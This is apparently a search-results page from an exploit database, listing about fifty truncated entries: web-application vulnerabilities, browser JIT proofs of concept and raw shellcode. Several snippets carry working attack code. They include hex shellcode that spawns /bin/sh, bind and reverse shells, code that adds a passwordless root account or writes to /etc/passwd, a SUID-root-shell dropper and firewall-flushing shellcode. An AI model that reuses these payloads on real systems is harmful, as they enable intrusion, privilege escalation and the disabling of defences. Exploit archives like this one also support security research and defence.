39001 matches found
Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities
Exploit for php platform in category web applications Synology Photostation Multiple Vulnerabilities Vendor: Synology Product: Synology Photostation Version: = 6.7.2-3429 Website: http://www.synology.com / / / / / / / / / / / / / / / / / / / / / \ / // / // / / / / / / / // / / / /,/// // ///...
Mambo < 4.5.4 - SQL Injection Vulnerability
Exploit for php platform in category web applications Mambo SQL Injection Vendor: Miro International Pty Ltd Product: Mambo Version: = 4.5.4 Website: http://www.mamboserver.com/ BID: 20366 OSVDB: 50002 Description: Mambo is a popular Open Source Content Management System released under the GNU...
CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities
Exploit for linux platform in category web applications Document Title: =============== CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000...
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
Exploit for linux platform in category web applications Document Title: =============== CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: =======================...
Docker Sudo Privilege Escalation Exploit
If a user has sudo permissions to /usr/bin/docker, it can be leveraged to escalated privileges to root. !/bin/bash SUDO Docker Privilege Escalation https://github.com/pyperanger/dockerevil SELINUX "bypass" using :z option...
CubeCart < 3.0.12 - Multiple Vulnerabilities
Exploit for php platform in category web applications CubeCart Multiple Vulnerabilities Vendor: Devellion Limited Product: CubeCart Version: = 3.0.12 Website: http://www.cubecart.com BID: 19782 CVE: CVE-2006-4525 OSVDB: 28279 28280 28281 SECUNIA: 21659 Description: CubeCart is a very popular web...
Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities
Exploit for php platform in category web applications Document Title: =============== Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities Security Update: http://community.shopware.com/Downloadscat448.html5.3.4 http://community.shopware.com/detail2035.html...
X-Cart < 4.1.3 - Arbitrary Variable Overwrite Vulnerability
Exploit for php platform in category web applications X-Cart Arbitrary Variable Overwrite Vendor: Qualiteam Product: X-Cart Version: $value $$var = $value; As we can see every single post variable is dynamically evaluated. This is especially dangerous because register globals and magic q...
PHPLib < 7.4 - SQL Injection Vulnerability
Exploit for php platform in category web applications PHPLib SQL Injection Vendor: PHPLib Product: PHPLib Version: newid=true; $this-name = $this-cookiename==""?$this-classname:$this-cookiename; if "" == $id $this-newid=false; switch $this-mode ca...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free She
/ Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r6, pc, 1 bx r6 .THUMB / Create a new socket/ /...
macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in AppleIntelCapriCon
Exploit for macOS platform in category dos / poc / AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure input buffer which it uses to index a small array of pointers to memory to copy back to userspace. There is no bounds checkin...
Microsoft Edge Chakra JIT - Out-of-Bounds Write Exploit
Exploit for windows platform in category dos / poc // Here's the PoC demonstrating OOB write. function optarr, start, end for let i = start; i end; i++ if i === 10 i += 0; // -- a arri = 2.3023e-320; function main let arr = new Array100; arr.fill1.1; for let i = 0; i 1000; i++ optarr, 0, 3; optar...
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Exploit for windows platform in category dos / poc / Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to issue 1310 . PoC: / // Enable the flag using '\n'.repeat0x1000 evalfunction f with function printf; ; ; +...
Primefaces 5.x - Remote Code Execution Exploit
Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...
GitStack 2.3.10 Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote ...
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation Exploit
Exploit for windows platform in category dos / poc / Let's start with comments in the "GlobOpt::TrackIntSpecializedAddSubConstant" method. // Track bounds for add or sub with a constant. For instance, consider b = a + 2. The value of 'b' should track // that it is equal to the value of 'a' + 2...
Oracle JDeveloper IDE Directory Traversal Vulnerability
Exploit for java platform in category web applications + Credits: John Page aka hyp3rlinx Vendor: ============= www.oracle.com Product: =========== JDeveloper IDE Oracle JDeveloper is a free integrated development environment that simplifies the development of Java-based applications addressing...
Microsoft Edge Chakra - Incorrect Scope Handling Exploit
Exploit for windows platform in category dos / poc // PoC: function funcarg = function printfunc; // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. printfunc; function func ; // Chakra fails to distinguish whether the function is referenced in the...
Microsoft Edge Chakra - AsmJSByteCodeGenerator::EmitCall Out-of-Bounds Read Exploit
Exploit for windows platform in category dos / poc / AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arridx & ...". In these case...
D-Link DSL-2640R - Unauthenticated DNS Change Vulnerability
Exploit for hardware platform in category web applications D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability Firmware Version: UK1.06 Hardware Version: B1 Copyright 2018 c Todor Donev https://ethical-hacker.org/ https://facebook.com/ethicalhackerorg/ Description: The vulnerability...
Microsoft Edge Chakra JIT - Stack-to-Heap Copy Exploit
Exploit for windows platform in category dos / poc / If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should no...
Smiths Medical Medfusion 4000 - DHCP Denial of Service Exploit
Exploit for hardware platform in category dos / poc !/usr/bin/python3 """PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. """ import datetime import socket def main:...
Microsoft Edge Chakra - JavascriptGeneratorFunction::GetPropertyBuiltIns Type Confusion Exploit
Exploit for windows platform in category dos / poc / Here's a snippet of the method. bool JavascriptGeneratorFunction::GetPropertyBuiltInsVar originalInstance, PropertyId propertyId, Var value, PropertyValueInfo info, ScriptContext requestContext, BOOL result if propertyId == PropertyIds::length...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...
glibc - getcwd() Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits / This software is provided by the copyright owner "as is" and any expressed or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall...
Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)
Author: zillion Email: email protected Homepage: http://www.safemode.org Linux x86 shell code that does an execve of /sbin/ipchains -F File name: flush-ipchains-shellcode.c / This shellcode will do /sbin/ipchains -F Written by email protected / char shellcode=...
Reservo Image Hosting Script 1.5 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Reservo Image Hosting Script 1.5 - Cross Site Scripting Date: 15-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: reservo.co Version: 1.6 CVE-ID: CVE-2018-5705 With support...
Transmission - RPC DNS Rebinding Exploit
Exploit for multiple platform in category remote exploits The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to ...
Zomato Clone Script - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Zomato Clone - Arbitrary File Upload Date: 16.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script Demo: http://jhinstitute.com/demo/foodpanda...
Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)
/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126
/ linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. / char shellc = / Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax...
Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)
/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...
SugarCRM 3.5.1 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: sugarCRM 3.5.1 XSS refeclted Date: 16/01/2017 Exploit Author: Guilherme Assmann Vendor Homepage: https://www.sugarcrm.com/ Version: 3.5.1 Tested on: kali linux, windows 7, 8.1, 10, ubuntu - Firefox Download...
Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)
Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : email protected Homepage: safemode.org File: w000t-shell.c / This shellcode will add a passwordless local root account 'w000t' Written by email protected Why so big ? it uses execve ;- /...
Belkin N600DB Wireless Router - Multiple Vulnerabilities
Exploit for hardware platform in category web applications Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities Date: 16/01/2018 Exploit Author: Wadeek Hardware Version: F9K1102as v3 Firmware Version: 3.04.11 Vendor Homepage:...
Seagate Personal Cloud - Multiple Vulnerabilities
Exploit for hardware platform in category remote exploits SSD Advisory – Seagate Personal Cloud Multiple Vulnerabilities Vulnerabilities summary The following advisory describes two 2 unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is “the easiest way ...
Master IP CAM 01 - Multiple Vulnerabilities
Exploit for hardware platform in category remote exploits Exploit Title: Master IP CAM 01 Multiple Vulnerabilities Date: 17-01-2018 Remote: Yes Exploit Authors: Daniele Linguaglossa, Raffaele Sabato Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 Vendor: Master IP CAM Version:...
Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)
Author: zillion Email: email protected Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File: flush-iptables-shell.c / This shellcode will do /sbin/iptables -F Written by email protected / char shellcode=...
BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)
/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...
Kaseya VSA R9.2 Arbitrary File Read Vulnerability
A security vulnerability was found in Kaseya VSA file download file functionality. Using this vulnerability an authenticated user in a Kaseya VSA environment is able to download arbitrary files from the server including source code of Kaseya, the database backups, configuration files, and even...
Kaseya VSA 9.2 Authentication Bypass Vulnerability
Exploit for asp platform in category web applications ------------------------------------------------------------------------ Authentication bypass in Kaseya VSA ------------------------------------------------------------------------ Kin Hung Cheng, Robert Hartshorn, May 2017...
D-Link DNS-325 ShareCenter 1.05B03 Shell Upload / Command Injection Vulnerabilities
D-Link DNS-325 ShareCenter versions 1.05B03 and below suffer from remote shell upload and command injection vulnerabilities. D-Link DNS-325 ShareCenter Multiple Vulnerabilities Released Date: 2017-XX-XX Last Modified: 2017-06-22 Company Info: D-Link Version Info: Vulnerable D-Link DNS-325...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...
D-Link DNS-343 ShareCenter 1.05 Command Injection Vulnerability
Exploit for hardware platform in category web applications D-Link DNS-343 ShareCenter = 1.05 Command Injection Released Date: 2017-01-15 Last Modified: 2017-06-22 Company Info: D-Link Version Info: Vulnerable D-Link DNS-343 ShareCenter = 1.05 -- Table of contents 00 - Introduction 00.1 Background...
Kaseya VSA 9.2 Shell Upload Vulnerability
Exploit for asp platform in category web applications ------------------------------------------------------------------------ Code execution in Kaseya VSA ------------------------------------------------------------------------ Kin Hung Cheng, Robert Hartshorn, May 2017...
Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
/ This shellcode writes to /etc/passwd the string for the user with uid&gid == 0; written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: nerf w00w00 BITS 32 jmp short path main: pop esi xor eax,eax push eax mov byte esi+11,al mov al,0x0a push eax push esi mov al,5 push eax...
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)
/ linux/x86 portbind /bin/sh port 64713 83 bytes http://www.gonullyourself.org sToRm / char shellcode = // : "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x53" // push %ebx "\x43" // inc %ebx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx...
Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)
/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...
Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)
/ Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx socket movl...